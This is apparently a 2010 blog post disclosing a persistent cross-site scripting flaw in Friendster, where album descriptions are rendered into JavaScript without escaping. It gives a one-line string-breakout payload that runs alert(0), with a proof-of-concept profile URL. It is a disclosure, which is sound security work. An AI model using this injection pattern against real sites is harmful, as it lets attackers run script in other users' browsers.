This site is soon to be deprecated by http://www.johnleitch.net

Sunday, May 2, 2010

Friendster.com Persistent XSS

Data submitted via album description and a few other fields is not properly escaped before being rendered into javascript.

Exploit: \";alert(0);//

PoC: http://www.friendster.com/viewalbums.php?uid=120927091
Posted by John Leitch at 1:13 PM
Labels: , , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)